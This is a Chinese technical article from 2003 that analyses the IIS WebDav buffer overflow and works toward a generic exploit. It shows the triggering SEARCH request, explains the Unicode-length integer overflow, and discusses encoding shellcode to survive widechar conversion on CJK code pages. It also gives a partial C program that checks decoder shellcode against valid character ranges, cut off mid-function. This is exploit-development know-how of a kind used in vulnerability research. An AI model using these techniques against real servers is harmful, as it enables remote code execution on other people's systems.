【实战】WebDav漏洞简单分析及通用exploit设计

WebDav漏洞简单分析及通用exploit设计

创建时间：2003-05-09
文章属性：原创
文章提交： eyas (ey4s_at_21cn.com)

WebDav漏洞简单分析及通用exploit设计
ey4s<cooleyas@21cn.com>
2003-04-25


    拜读了isno写的<<WebDav远程溢出漏洞分析>>、<<通用的攻击WebDAV漏洞的方法>>，以及Nankia写的
<<Webdav漏洞ISNO方法的补充>>之后，用他们发布的exploit、以及能在网上找到的exploit在我的一些测试
机上测试，有些成功，有些不成功。于是便想自己调试一下。在后来的调试过程中，参考了大量资料，特别
是yuange所写的<<widechar的字符串缓冲溢出攻击技术>>。在这过程中我学到了很多东西，自己也有些心
得体会，其中可能有不少错误的地方，于是便想写下来，一来请各位高手多多指点，二来可以当做笔记供日
后参考（我记性不好:-)）。
    
    建议各位在阅读了以上提及的文章后再继续往下看。以下测试是在windows 2000 简体中文版本进行的。


   -=-=-=- 第一部分 漏洞简单分析 -=-=-=-


    webdav溢出具体是怎么发生的我就不罗嗦了，请大家参考isno所写的文章，这里只简述一下。我们向
IIS发送如下数据：
    
    SEARCH /O HTTP/1.0
    Host:xxx
    Content-Type: text/xml
    Content-length: 3
    xxx

    IIS把我们请求的文件名转换成UNICODE，在前面加上路径，然后作为文件名参数传给了
GetFileAttributesExW（先加上路径再转换成UNICODE，还是转换成UNICODE再加路径，我没有仔细看，但这
并不重要）。假如IIS根目录是c:/inetpub/wwwroot，那么传递给GetFileAttributesExW的文件名就是
"//?/c:/inetpub/wwwroot/O"的UNICODE形式，如下：
0197efe0  5c 00 5c 00 3f 00 5c 00-63 00 3a 00 5c 00 69 00  /./.?./.c.:./.i.
0197eff0  6e 00 65 00 74 00 70 00-75 00 62 00 5c 00 77 00  n.e.t.p.u.b./.w.
0197f000  77 00 77 00 72 00 6f 00-6f 00 74 00 5c 00 4f 00  w.w.r.o.o.t./.O.
    
    漏洞引用关系如下:

    GetFileAttributesExW
    |__RtlDosPathNameToNtPathName_U
        |__RtlInitUnicodeString <-buff超过65535就会导致短整型数溢出
        |__在这后面的代码进行字符copy的时候就会触发堆栈溢出
    
    我们来看看UNICODE_STRING结构的定义：
    typedef struct _UNICODE_STRING
    {
      USHORT Length; <--这长度指的是buffer的字节数，并不是unicode字符的个数
      USHORT MaximumLength;
      PWSTR Buffer;
    } UNICODE_STRING *PUNICODE_STRING;

    从上面的分析我们可以看到，事实上只要我们保证($FileName+$IIS_Path)*2 > 65535就可以触发
存储buff长度的短整型数溢出，其中$FileName是我们提交的文件名（非UNICODE形式）。

  

    -=-=-=- 第二部分 关于widechar的字符串 -=-=-=-

    IIS在接收到我们发送的buff之后，会调用MultiByteToWideChar函数把我们的buff转换成widechar，
即UNICODE，用的CodePage是系统默认的CodePage，在简体中文系统上是936。在转换过程中，不符合
相应code page widechar范围的双字节字符会被替换掉，单字节字符会被转换成"/xXX/x00"的形式。

    怎么判断字符是单字节字符还是双字节字符?  简体中文、繁体中文、韩文、日文都是双字节语言，
即double-byte character set (DBCS)。上述四种语言双字节中的第一个字节都大于等于0x80。所以
某个字符如果大于等于0x80的话，那么后面就还有一个字节的字符一起跟这个字符组成一个完整"字符"。

    不信的话，可以写程序验证一下，调用一个API就可以了。
    The IsDBCSLeadByteEx function determines whether a specified byte is a lead byte
that is, the first byte of a character in a double-byte character set (DBCS).
    BOOL IsDBCSLeadByteEx(
      UINT CodePage,   // identifier of code page
      BYTE TestChar    // byte to test
    );

    假如我们发送的字符是"/x61/x81/x81"的话，用简体中文的CodePage经过MultiByteToWideChar函数
转换后就成了"/x61/x00/xXX/xXX"，当然，前提是"/x81/x81"转换成Unicode后符合简体中文的wide
char范围。所以我们要确定shellcode在经过MultiByteToWideChar转换后，符合相应code page的wide
char范围。

    反复拜读了yuange的文章<<widechar的字符串缓冲溢出攻击技术>>后，由衷佩服yuange技术之高！
向他致敬！
    yuange在他的文章中提出：
    (1)把real shellcode编码成可见字符，即小于0x80。这样在经过MultiByteToWideChar转换后就成为
"/xXX/x00"，字符不会被改变。
    (2)再精心编写一段符合相应code page widechar范围的代码，用这些代码来解码上述经过编码的
real shellcode。


    yuange在那篇文章里面还提供了一段解码shellcode的代码，这些代码符合简体中文WideChar范围。
后来台湾网友Nankia说这些代码在繁体中文上面无法使用，然后Nankia自己又写了个符合繁体中文
widechar范围的解码代码。

    后来我花了不少时间，在yuange发布的代码的基础上，修改了一些地方，写了一段符合简体中文、繁体
中文、韩文、日文 widechar范围的解码代码。以下是我测试这些解码代码是否符合相应widechar范围的
c代码。不知yuange和Nankia是怎么调试解码代码的？？

-=-=-=-=-=-=-=-=-=-=-=-=-=-= CheckCode.c -=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=-=-=-=
#include <windows.h>
#include <stdio.h>

#define CODE_CN        936// ANSI/OEM - Simplified Chinese (PRC, Singapore)
#define CODE_TW        950// ANSI/OEM - Traditional Chinese (Taiwan; Hong Kong SAR, PRC)
#define CODE_JP        932// ANSI/OEM - Japanese, Shift-JIS
#define CODE_Korean    949// ANSI/OEM - Korean (Unified Hangeul Code)
int        g_iCodePageList[]={936,950,932,949};
//如果为合法的wide char范围，则此byte值为1，否则为0
char    *g_szWideCharShort;

void checkcode(unsigned char *shellcode,int iLen);
void printsc(unsigned char *sc, int len);
BOOL MakeWideCharList();
void SaveToFile();
void  shellcodefnlock();

#define  FNENDLONG   0x08

void main()
{
    char *fnendstr="/x90/x90/x90/x90/x90/x90/x90/x90/x90";
    unsigned    char    temp;
    unsigned    char    *shellcodefnadd;
    unsigned    char    shellcode[512];
    int            len,k;
    
    /* 定位　shellcodefnlock的汇编代码　*/
    shellcodefnadd=shellcodefnlock;
    temp=*shellcodefnadd;
    if(temp==0xe9)
    {
          ++shellcodefnadd;
          k=*(int *)shellcodefnadd;
          shellcodefnadd+=k;
          shellcodefnadd+=4;
    }
    for(k=0;k<=0x500;++k)
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0)
             break;
    /* shellcodefnadd+k+8是得到的shellcodefnlock汇编代码地址 */
    len = 2*wcslen(shellcodefnadd+k+8);
    memcpy(shellcode,shellcodefnadd+k+8,len);

    if(!MakeWideCharList()) return;
    //SaveToFile();
    /*检测shellcode是否在合法的wide char范围*/
    checkcode(shellcode, len);
    //printsc(shellcode, len);
}

BOOL MakeWideCharList()
{
    unsigned char wbuff[4];
    unsigned char wbuff2[4];
    unsigned char buff[4];
    int         i,j,ret,k;

    g_szWideCharShort = (char *)malloc(65536);
    memset(g_szWideCharShort, 1 , 65536);

    for(k=0;k<sizeof(g_iCodePageList)/sizeof(int);k++)//for 1
    {
        printf("UseCodePage=%d/n",g_iCodePageList[k]);
        for(i=0;i<256;i++)//for 2
        {
            for(j=0;j<256;j++)//for 3
            {
                if((i==0) && (j==0)) j=1;
                memset(buff, 0, 4);
                memset(wbuff2, 0, 4);
                wbuff[0]=(BYTE)i;
                wbuff[1]=(BYTE)j;
                wbuff[2]=(BYTE)'/0';
                wbuff[3]=(BYTE)'/0';
                if(!(ret = WideCharToMultiByte(g_iCodePageList[k], 0,
(unsigned short *)wbuff, 1, buff, 2, 0,0)))